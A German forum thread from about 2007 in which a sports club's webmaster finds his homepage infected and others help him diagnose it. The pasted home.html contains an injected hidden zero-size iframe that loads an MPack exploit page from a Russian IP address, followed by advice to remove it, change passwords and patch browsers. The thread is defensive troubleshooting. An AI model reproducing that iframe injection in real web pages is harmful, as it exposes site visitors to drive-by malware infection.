hi!
folgendes problem: auf meiner internetseite befindet sich anscheinend ein virus. zumindest schlägt antivir an und meldet "enthält verdächtigen code: HEUR/Exploit.HTML" im opera cache.
jetzt hab ich aber keine ahnung wie der da reingekommen sein könnte bzw wie ich den wieder los werde. wäre nett wenn mir wer helfen könnte.

zum testen, die homepage ist http://www.tt-etterzhausen.de/

ich weiß nicht ob das naiv war, hab auch schon den entsprechenden ordner per ftp heruntergeladen und mit antivir überprüft. findet aber nix.

gruß christian

Kauf dir mal nen gescheites Anti-V-Programm!

Kaspersky 7 sagt nichts.

SG

hi!
folgendes problem: auf meiner internetseite befindet sich anscheinend ein virus. zumindest schlägt antivir an und meldet "enthält verdächtigen code: HEUR/Exploit.HTML" im opera cache.
jetzt hab ich aber keine ahnung wie der da reingekommen sein könnte bzw wie ich den wieder los werde. wäre nett wenn mir wer helfen könnte.

zum testen, die homepage ist http://www.tt-etterzhausen.de/

ich weiß nicht ob das naiv war, hab auch schon den entsprechenden ordner per ftp heruntergeladen und mit antivir überprüft. findet aber nix.

gruß christian
Dann leer erstmal den Cache von Opera (und anderen Browsern) und Scanne dein System. Eigentlich sollte bei der Meldung auch die Datei mit angegeben werden, das würde weiterhelfen.

Welches Anti-Viren Programm verwendest du?

p.s.
Von Avira liest man diesbezüglich bei google recht viel.

Groß angelegter Angriff infiziert mehr als 11.000 Webseiten (http://www.avira.de/de/sicherheits-news/grob_angelegter_angriff_infiziert_mehr_als_11000_webseiten.html)
Zum gegenwärtigen Zeitpunkt konnte Avira mehr als 11.000 betroffener Webseiten ausfindig machen. Dabei handelt es sich um legale Seiten, in die nur wenige Zeilen HTML Code eingefügt wurde. Dadurch wurden die Seiten so modifiziert, dass der Browser mittels IFRAME eine weitere Seite lädt, die einen Exploitcode enthält. Bei Ausführung wird dann ein Trojaner auf den Computer des Nutzers herunter geladen.

Bei dieser Attacke wurde ein so genanntes Hackertool names MPack verwendet. Dieses Verbreitungs- und Attackier-Tool verfügt über eine Sammlung an Exploits und detaillierte Statistiken. Dieser Exploitcode wird von Aviras proaktivem Heuristikmodul AHeAD derzeit als HEUR/Exploit.HTML erkannt.

Hier mal die home.html (startseite)
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="Adobe PageMill 3.0 Win">
<style type="text/css">
a:hover { text-decoration:underline overline; }
</style>
</HEAD>
<BODY BGCOLOR="#ffffff" LINK="#000000" ALINK="#000000" VLINK="#000000"><iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
<center>
<br>
<br>
<font size="5" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"><b>Herzlich Willkommen auf der Homepage der Tischtennisabteilung des TV Etterzhausen!</b></font><font size="4" face="Arial,Helvetica,Geneva,Swiss,SunSans-Regular"><b><br>

</b></font><br>
<br>
<a href="http://www.tv-etterzhausen.de" target="_blank"><img src="WappenTVE.jpg" alt="" height="284" width="183" border="0"></a></center>
<P><FONT
SIZE="-1" FACE="Arial"></FONT></P>
</BODY>
</HTML>

Seht ihr die Zeile mit dem iframe und der IP als source? Das ist ganz sicher der Grund für die Warnung!

Also rausnehmen und Passwort ändern!

http://www.dshield.org/ipinfo.html?ip=81.95.145.240
IP Address: 81.95.145.240
Hostname: 81.95.145.240
Country: RU

das (siehe anhang) ist der inhalt, der dabei geladen und ausgeführt wird. (korrektur: der alte war nicht der richtige, sondern nur ein test, da ich den parameter beim aufruf nicht mit übergab)

verwende avira.

es hat aber nichts mit dem system zu tun weil die selbe meldung am anderen pc bzw beim ie auch kommt.

bei opera ist es opr5DJ.htm, beim ie index[1].htm, jeweils im entsprechenden cache

Hier mal die home.html (startseite)

Seht ihr die Zeile mit dem iframe und der IP als source? Das ist sicher der Grund für die Warnung!

Also rausnehmen und Passwort ändern!


k, ich probiers mal

/edit: ja das wirds wohl gewesen sein, es kommt nicht mehr. vielen dank!

aber was anderes: wie kommt die zeile da rein? von mir is die nicht, auf den dateien auf meinem rechner ist die nicht enthalten.

Wahrscheinlich beim Server eingebrochen.

Exploit Mpack bedroht Surfer (http://www.virenschutz.info/beitrag_Exploit+Mpack+bedroht+Surfer_1669.html) [virenschutz.info]
Groß angelegter Angriff auf Web-Anwender im Gange (http://www.heise.de/security/news/meldung/91345) [heise security]
Weitere Details zu Web-Attack-Toolkit MPack (http://www.heise.de/security/news/meldung/91542) [heise security]

Immer fleißig Browser und damit zusammenarbeitende andere Programme Updaten, da offenbar nur bekannte Sicherheitslücken ausgenutzt werden.

aber was anderes: wie kommt die zeile da rein? von mir is die nicht, auf den dateien auf meinem rechner ist die nicht enthalten.
Wahrscheinlich über ne Schwachstelle in Confixx: http://www.heise.de/newsticker/meldung/93627

Kauf dir mal nen gescheites Anti-V-Programm!

Kaspersky 7 sagt nichts.

SG

Finde nur ich das komisch?


Stellt dieses iframe für ein aktuelles/gepatchtes Windows eine Gefahr dar?

Finde nur ich das komisch?


Stellt dieses iframe für ein aktuelles/gepatchtes Windows eine Gefahr dar?

Ich weiss nicht, was du mir damit sagen willst (falls es mir überhaupt gilt).

Ich finde es nur komisch, daß der Threadstarter alarm schlägt und bei mir tut sich nichts. Mein Sys ist up to date, aber denoch müsste ja Kaspersky alarm machen. Oder taucht Kaspersky so wenig? Glaub nicht...

SG

Finde nur ich das komisch?


Stellt dieses iframe für ein aktuelles/gepatchtes Windows eine Gefahr dar?
Vielleicht wurde bei Super Grobi auch nur "Sorry! Your IP is blocked." ausgegeben und gar kein Trojaner installiert.

Das Problem betrifft eher die Browser, die sollten aktuell sein. Bei Firefox 2.0.0.6 geh ich mal davon aus, dass es nicht passiert - aber auch nur Spekulation, da MPack viele Exploits beinhaltet.

Aus einem Interview mit einem der Entwickler von MPack bei The Register (http://www.theregister.co.uk/2007/07/23/mpack_developer_interview/)
Anything else you'd like to add?

I would advise you to use the Opera browser with scripts and plug-ins disabled in order not to be caught by the MPack someday.

Für Firefox sei daher NoScript (http://noscript.net/) empfohlen, Opera bietet sowas (wie NoScript) selbst an.

Hab gerade im englischen Wikipedia Artikel (http://en.wikipedia.org/wiki/MPack_(software)) ein schönes PDF gefunden: PandaLabs Report: MPack uncovered (http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/11/MPack.pdf)
Die haben dort MPack in Version v0.84 (v0.94 ist wohl die aktuelle) beleuchtet und so wie das aussieht, reicht ein aktuelles Windows + Browser aus, um nicht Opfer zu werden.